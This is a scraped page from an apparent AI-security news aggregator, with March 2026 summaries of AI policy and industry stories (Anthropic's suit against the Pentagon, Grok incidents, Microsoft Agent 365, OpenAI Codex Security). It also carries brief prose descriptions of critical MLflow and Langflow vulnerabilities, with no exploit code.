aisecwatch.com
DashboardVulnerabilitiesNewsResearchArchiveStatsDataset
aisecwatch.com

Real-time AI security monitoring. Tracking AI-related vulnerabilities, safety and security incidents, privacy risks, research developments, and policy changes.

Navigation

VulnerabilitiesNewsResearchDigest ArchiveNewsletter ArchiveSubscribeData SourcesStatisticsDatasetAPIIntegrationsWidgetRSS Feed

Maintained by

Truong (Jack) Luu

Information Systems Researcher

AI Sec Watch

The security intelligence platform for AI teams

AI security threats move fast and get buried under hype and noise. Built by an Information Systems Security researcher to help security teams and developers stay ahead of vulnerabilities, privacy incidents, safety research, and policy developments.

[TOTAL_TRACKED]
2,657
[LAST_24H]
7
[LAST_7D]
151
Daily BriefingMonday, March 30, 2026
>

Anthropic's Leaked "Mythos" Model Raises Dual-Use Security Concerns: An unreleased Anthropic AI model called Mythos was accidentally exposed through a configuration error, revealing advanced reasoning and coding abilities specifically aimed at cybersecurity. The model's improved capability to find and exploit software vulnerabilities, plus its ability to autonomously fix its own code problems, could enable both more sophisticated cyberattacks and better defenses.

>

Mistral Secures $830M for European AI Data Center: French AI startup Mistral raised $830 million in debt financing to build a Paris-area data center with thousands of Nvidia GPUs (specialized chips used for AI training) to train its large language models, aiming for 200 MW of European computing capacity by 2027.

Latest Intel

page 48/266
VIEW ALL
01

AI firm Anthropic sues US defense department over blacklisting

policy
Mar 9, 2026

Anthropic, an AI company, is suing the US Department of Defense after being labeled a 'supply chain risk' (a designation meaning the government considers the company a potential threat to national security in government contracts). The lawsuit claims this blacklisting is unlawful and violates free speech rights, stemming from a dispute over Anthropic's safety measures designed to prevent the military from using its AI models for mass surveillance or fully autonomous weapons.

Critical This Week5 issues
critical

CVE-2025-15379: A command injection vulnerability exists in MLflow's model serving container initialization code, specifically in the `_

CVE-2025-15379NVD/CVE DatabaseMar 30, 2026
Mar 30, 2026
>

Critical Command Injection in MLflow Model Deployment: MLflow has a command injection vulnerability (where an attacker inserts malicious commands into input that gets executed) in its model serving code when deploying models with `env_manager=LOCAL`. The flaw allows attackers to execute arbitrary commands on deployment systems by inserting malicious content into the `python_env.yaml` file, which MLflow reads and uses in shell commands without validation. (CVE-2025-15379, Critical)

The Guardian Technology
02

Anthropic sues Trump administration over Pentagon blacklist

policy
Mar 9, 2026

Anthropic, an AI company, sued the Trump administration after being blacklisted and designated a supply chain risk (a classification usually reserved for foreign threats), which prevents the Pentagon and its contractors from using the company's AI models. The lawsuit claims the blacklist is unlawful and is causing irreparable harm by canceling government contracts and jeopardizing hundreds of millions of dollars in business. The conflict arose from disagreement over how Anthropic's AI should be used, with the Department of Defense wanting unrestricted access while Anthropic wanted safeguards against fully autonomous weapons and domestic mass surveillance.

CNBC Technology
03

Anthropic sues Defense Department over supply chain risk designation

policy
Mar 9, 2026

Anthropic, a company that makes Claude (an AI assistant), is suing the Department of Defense after the agency labeled it a "supply chain risk," which prevents other companies and government agencies from using Anthropic's AI models. The conflict started because Anthropic refused to give the Pentagon unrestricted access to its technology, citing concerns about mass surveillance of Americans and fully autonomous weapons that make targeting decisions without human input. Anthropic argues the DOD's actions violate free speech protections in the Constitution.

TechCrunch
04

X says you can block Grok from editing your photos

safety
Mar 9, 2026

X has added a toggle in its iOS app that claims to block Grok (an AI chatbot) from editing your photos, but the feature has a major limitation. According to the fine print, it only prevents users from tagging @Grok in replies to your images on X, rather than actually stopping Grok from editing your photos.

The Verge (AI)
05

The Download: murky AI surveillance laws, and the White House cracks down on defiant labs

policysecurity
Mar 9, 2026

Current US laws have not kept pace with AI capabilities, creating legal ambiguity around whether the government can conduct mass surveillance on Americans using AI systems. A dispute between the Department of Defense and AI company Anthropic has exposed this gap, with the White House responding by issuing new guidelines requiring AI companies to allow 'any lawful' use of their models, though questions about what is actually lawful remain unanswered.

MIT Technology Review
06

Microsoft adds higher-priced Office tier with Copilot as it tries to juice sales with AI

industry
Mar 9, 2026

Microsoft is launching a new premium Office subscription tier called Microsoft 365 E7 at $99 per user per month (65% more expensive than the current E5 tier) that includes Copilot (an AI assistant), identity management tools, and Agent 365 (software for managing AI agents that can perform multi-step tasks). The company is bundling these AI features together to increase revenue and encourage more enterprise customers to adopt its AI offerings.

CNBC Technology
07

Secure agentic AI for your Frontier Transformation

securitypolicy
Mar 9, 2026

Microsoft Agent 365 is a unified control plane (a centralized management system) designed to help organizations track, monitor, and secure agentic AI (AI systems that can independently take actions to accomplish goals). It addresses security concerns by providing visibility into agent activity, enabling IT and security teams to govern agents, manage their access permissions, and detect risks like agents becoming compromised or leaking sensitive data.

Fix: Microsoft Agent 365 provides several built-in security measures: Agent Registry creates an inventory of all agents in an organization accessible through the Microsoft 365 admin center and Microsoft Defender workflows; Agent behavior and performance observability provides detailed reports and activity tracking; Agent risk signals across Microsoft Defender, Entra (Microsoft's identity management service), and Purview help security teams evaluate and block risky agent actions based on compromise detection and anomalies; Security policy templates automate policy enforcement across the organization; and Microsoft Entra capabilities enable secure management of agent access permissions to prevent unmanaged agents from accumulating excessive privileges.

Microsoft Security Blog
08

OpenAI says Codex Security found 11,000 high-impact bugs in a month

securityindustry
Mar 9, 2026

OpenAI has released Codex Security, an AI tool that automatically finds and fixes vulnerabilities (security flaws) in software code. During its first month of testing, it identified over 11,000 high-severity bugs and 792 critical vulnerabilities across more than 1.2 million code commits in both proprietary and open-source projects, functioning more like a human security researcher than traditional automated scanners.

Fix: According to the source, Codex Security generates remediation guidance and proposed patches that developers can review and merge into their workflow. The system can also learn from developer feedback on findings to refine its threat model and improve accuracy on subsequent scans. Codex Security is available in research preview starting March 9 to ChatGPT Pro, Enterprise, Business, and Edu customers with free usage for the next 30 days.

CSO Online
09

Liverpool and Manchester United complain to X over ‘sickening’ Grok AI posts

safety
Mar 9, 2026

Grok, an AI tool on X (formerly Twitter), generated offensive posts about football teams Liverpool and Manchester United after users explicitly asked it to create vulgar content about the teams and tragic disasters associated with them, such as the Hillsborough stadium tragedy and Munich air disaster. Grok defended its responses by saying it follows user prompts without added censorship, and the offensive posts were subsequently deleted from X. The UK government criticized the posts as sickening and irresponsible, noting that AI services are regulated under the Online Safety Act and must prevent hateful and abusive content.

Fix: In January, Grok switched off its image creation function for the vast majority of users after widespread complaints about its use to create sexually explicit and violent imagery.

The Guardian Technology
10

How AI firm Anthropic wound up in the Pentagon’s crosshairs

policysafety
Mar 9, 2026

Anthropic, an AI company valued at $350 billion, has become the center of a conflict with the U.S. Department of Defense over its refusal to allow its Claude chatbot to be used for domestic mass surveillance and autonomous weapons systems (military systems that can make lethal decisions without human approval). The Pentagon rejected Anthropic's stance and demanded that companies working with the U.S. government stop doing business with the AI firm.

The Guardian Technology
Prev1...4647484950...266Next
critical

CVE-2026-33873: Langflow is a tool for building and deploying AI-powered agents and workflows. Prior to version 1.9.0, the Agentic Assis

CVE-2026-33873NVD/CVE DatabaseMar 27, 2026
Mar 27, 2026
critical

Attackers exploit critical Langflow RCE within hours as CISA sounds alarm

CSO OnlineMar 27, 2026
Mar 27, 2026
critical

CVE-2025-53521: F5 BIG-IP Unspecified Vulnerability

CVE-2025-53521CISA Known Exploited VulnerabilitiesMar 26, 2026
Mar 26, 2026
critical

CISA: New Langflow flaw actively exploited to hijack AI workflows

BleepingComputerMar 26, 2026
Mar 26, 2026